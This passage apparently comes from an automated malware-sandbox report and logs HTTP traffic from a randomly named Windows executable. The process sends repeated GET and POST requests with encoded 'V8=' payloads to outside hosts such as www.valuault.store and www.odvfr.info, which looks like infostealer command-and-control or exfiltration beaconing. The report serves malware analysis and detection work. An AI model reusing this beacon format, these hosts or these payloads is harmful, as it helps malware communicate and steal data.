                                                                                                                          Jan 10, 2025 16:42:08.872823954 CET458INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:39:27 GMT
                                                                                                                          Server: Apache/2.4.10 (Debian)
                                                                                                                          Content-Length: 278
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.54998046.38.243.234802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:10.788733959 CET575OUTGET /z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.lmueller.dev
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:42:11.421376944 CET458INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:39:30 GMT
                                                                                                                          Server: Apache/2.4.10 (Debian)
                                                                                                                          Content-Length: 278
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.549981209.74.79.42802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:24.583030939 CET833OUTPOST /nhb9/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.valuault.store
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.valuault.store
                                                                                                                          Referer: http://www.valuault.store/nhb9/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 6f 7a 43 6b 54 4b 76 71 4a 4e 69 68 63 42 6f 7a 75 59 6e 63 41 56 78 73 63 72 6b 35 4b 4a 65 43 64 6e 6e 59 56 4d 43 66 52 71 51 6a 77 4e 55 4c 30 6b 53 7a 39 47 44 50 34 50 38 68 32 4d 65 6b 50 7a 57 63 45 4f 4a 2f 42 73 6e 67 4a 4f 6f 65 72 4d 51 56 2b 47 7a 73 43 77 32 6a 64 72 75 75 6b 51 74 68 69 6e 31 78 66 45 32 6d 4c 52 6c 58 59 54 36 32 61 6d 77 50 77 72 54 6e 53 57 50 48 53 6f 52 53 39 6b 68 2f 6e 61 73 56 34 63 57 4e 6f 48 4a 4c 6f 67 61 32 53 63 69 2f 6f 59 33 62 46 6a 48 4d 49 59 34 39 49 4b 43 65 67 61 56 35 42 59 47 5a 62 4b 71 79 63 4c 55 3d
                                                                                                                          Data Ascii: V8=eN8YeZa+i+ntozCkTKvqJNihcBozuYncAVxscrk5KJeCdnnYVMCfRqQjwNUL0kSz9GDP4P8h2MekPzWcEOJ/BsngJOoerMQV+GzsCw2jdruukQthin1xfE2mLRlXYT62amwPwrTnSWPHSoRS9kh/nasV4cWNoHJLoga2Sci/oY3bFjHMIY49IKCegaV5BYGZbKqycLU=
                                                                                                                          Jan 10, 2025 16:42:25.130162001 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:25 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.549982209.74.79.42802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:27.385236979 CET853OUTPOST /nhb9/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.valuault.store
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.valuault.store
                                                                                                                          Referer: http://www.valuault.store/nhb9/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 4f 43 64 44 33 59 55 4e 43 66 51 71 51 6a 6c 39 55 4f 70 30 53 4f 39 47 50 48 34 4e 6f 68 32 4d 4b 6b 50 33 53 63 45 38 68 77 44 38 6e 69 47 75 6f 63 6c 73 51 56 2b 47 7a 73 43 78 58 32 64 71 47 75 6b 67 39 68 69 44 68 79 63 45 32 6c 4f 52 6c 58 54 7a 36 36 61 6d 78 67 77 76 4c 4a 53 55 6e 48 53 73 56 53 7a 51 4e 2b 74 61 74 63 33 38 58 62 35 58 51 6a 74 6a 32 57 58 2f 6e 4b 38 34 44 57 4e 31 32 6d 53 36 77 56 62 71 75 6d 77 4a 64 4f 51 6f 6e 77 42 70 36 43 43 63 42 55 42 58 6b 65 4c 2b 33 4e 72 58 2b 57 7a 4e 4c 43 6a 77 68 68
                                                                                                                          Data Ascii: V8=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/OCdD3YUNCfQqQjl9UOp0SO9GPH4Noh2MKkP3ScE8hwD8niGuoclsQV+GzsCxX2dqGukg9hiDhycE2lORlXTz66amxgwvLJSUnHSsVSzQN+tatc38Xb5XQjtj2WX/nK84DWN12mS6wVbqumwJdOQonwBp6CCcBUBXkeL+3NrX+WzNLCjwhh
                                                                                                                          Jan 10, 2025 16:42:27.942660093 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:27 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.549983209.74.79.42802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:29.934814930 CET1870OUTPOST /nhb9/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.valuault.store
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.valuault.store
                                                                                                                          Referer: http://www.valuault.store/nhb9/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 75 53 53 6b 49 70 33 71 4d 74 69 69 5a 42 6f 7a 68 34 6e 51 41 55 4e 73 63 70 4a 6b 4b 2f 47 43 63 78 2f 59 55 75 71 66 43 36 51 6a 35 74 55 50 70 30 53 66 39 43 6a 44 34 4e 56 65 32 50 79 6b 4a 6b 61 63 47 4e 68 77 4a 38 6e 69 45 75 6f 64 72 4d 51 36 2b 48 44 6f 43 77 37 32 64 71 47 75 6b 69 31 68 72 33 31 79 52 6b 32 6d 4c 52 6c 62 59 54 36 57 61 6d 34 58 77 76 66 33 53 6c 48 48 54 49 78 53 78 6c 68 2b 33 61 74 53 30 38 58 54 35 58 73 38 74 6a 71 38 58 38 37 6b 38 37 54 57 4f 6b 43 6c 44 49 74 43 4e 4d 4b 2f 39 35 35 59 43 2f 66 52 41 36 75 4e 48 4f 4e 35 4e 79 64 38 44 34 58 55 75 45 4c 34 6c 63 58 7a 78 41 64 31 51 48 64 34 73 48 38 69 2f 57 50 79 4a 30 4d 61 66 49 39 73 46 75 49 6b 70 39 4b 69 39 6f 45 63 6f 31 4f 4b 54 68 68 6e 69 34 62 57 43 45 76 52 58 46 30 38 41 51 59 2f 4b 4b 54 55 30 57 35 75 55 4e 79 46 78 59 6e 4e 72 44 4d 50 54 7a 36 32 34 63 50 65 51 50 34 47 71 36 4e 51 65 6e 61 6e 57 64 2f 78 63 61 57 39 70 2b 6d 72 32 37 2b 6b 68 67 72 [TRUNCATED]
                                                                                                                          Data Ascii: V8=eN8YeZa+i+ntuSSkIp3qMtiiZBozh4nQAUNscpJkK/GCcx/YUuqfC6Qj5tUPp0Sf9CjD4NVe2PykJkacGNhwJ8niEuodrMQ6+HDoCw72dqGuki1hr31yRk2mLRlbYT6Wam4Xwvf3SlHHTIxSxlh+3atS08XT5Xs8tjq8X87k87TWOkClDItCNMK/955YC/fRA6uNHON5Nyd8D4XUuEL4lcXzxAd1QHd4sH8i/WPyJ0MafI9sFuIkp9Ki9oEco1OKThhni4bWCEvRXF08AQY/KKTU0W5uUNyFxYnNrDMPTz624cPeQP4Gq6NQenanWd/xcaW9p+mr27+khgrFl+G/Rh9U+8ycm637ekxXb2rhodORQBPV9VOx/7/crmyM1pudQcTjCgEJc0DFYR12UvaxbidCZ8zA+HoyEgxCFZ1VacjHYQu6mlhYu5b+DThYwuSoroGMChuQy5QjpixSWhuA8Xbah+DhqCAlOsymCDFrOnVOOgafU01VuAVB5W6AFEJth0qeT8iGcNK8e2OFTUDLFobX0cYAS/LLAsv1fEXfPb8i3ftS3B6dXXsnKEkh1wPgySNuqU5P9MGDWG4UgGhHkLm5vVX2ri7Kedv48eGORULUcLJ4PSNAj3EPYhrMIr0k9OMcOUspXWEQxtrcDHN5BAMQaUsA8qGMfw6RxpTmk+EvSS9+WSFVaDQsAo5fs1WVmuHkeVVyB8G/cjjcvv/HONeIlwuM0DEIslub6AyIapfUGgOSVuMpj/4GP3MZq+OEz3RO/IkkghJrgfsaOVH1KyOOv7L4PKFAAGnxzzdKCOnVTNEY59yDjFs84ooz3mfct6sYK+Sjgg9/osdrzz4O3xTv72eOSGBpliu/PUJDI2JWUgh0Z+PXCafDcBg195S7AOus//ol0yu3pK0ALxgqRqzplbsT0/2ea4tP1e3aP5FSPGhqZ9eT3p5WbG5+fcz7+Z/IxoRXA1OQIY5N8m3LoX/RnnEFmQ7N0Pk9+tx5RhxrtnWKl [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:42:30.510641098 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:30 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.549984209.74.79.42802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:32.474770069 CET577OUTGET /nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.valuault.store
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:42:33.077318907 CET548INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:32 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.54998547.254.140.255802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:42:38.126777887 CET821OUTPOST /rl5p/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.odvfr.info
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.odvfr.info
                                                                                                                          Referer: http://www.odvfr.info/rl5p/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 5a 37 50 37 35 79 4f 6a 68 59 64 6a 35 79 6a 45 6c 31 6a 51 58 75 4e 4a 4b 34 76 62 48 52 57 2b 46 54 44 4e 32 47 61 42 76 2f 41 45 49 74 33 67 72 49 6f 41 32 6d 6f 61 46 52 52 61 6d 46 42 38 7a 50 4b 45 35 74 2f 4a 36 72 39 50 6e 71 6f 2b 4b 70 44 45 4a 38 6b 36 6f 53 6c 47 4a 57 63 38 6c 6c 62 53 30 52 33 52 6e 53 57 53 58 49 4e 43 48 44 48 4a 71 6c 62 7a 2f 6e 6e 4e 4b 63 47 4a 48 76 4f 41 30 2b 73 55 4a 47 53 48 54 55 7a 66 54 32 52 71 5a 4c 6d 6a 47 37 6e 77 47 43 4b 78 33 61 68 71 50 77 68 6f 6c 42 6e 35 36 69 68 43 67 65 71 4f 62 6a 57 62 44 45 4e 68 75 6e 6e 75 79 36 41 43 31 41 77 3d
                                                                                                                          Data Ascii: V8=Z7P75yOjhYdj5yjEl1jQXuNJK4vbHRW+FTDN2GaBv/AEIt3grIoA2moaFRRamFB8zPKE5t/J6r9Pnqo+KpDEJ8k6oSlGJWc8llbS0R3RnSWSXINCHDHJqlbz/nnNKcGJHvOA0+sUJGSHTUzfT2RqZLmjG7nwGCKx3ahqPwholBn56ihCgeqObjWbDENhunnuy6AC1Aw=
                                                                                                                          Jan 10, 2025 16:42:38.768768072 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 10 Jan 2025 15:42:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Trace: 2BAC77301CE331898FF2AF5DDCA8E709C19D02B8BC80A5F6DFFF4B3B7D01
                                                                                                                          Set-Cookie: _csrf=6c69579958ed0c991320ab80f32bc9ff2d20d45d2426e21589aa2e6f8f253655a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ViUHRtJmdzTkEEH8FUwB1vPvLxXyFhMS%22%3B%7D; path=/; HttpOnly
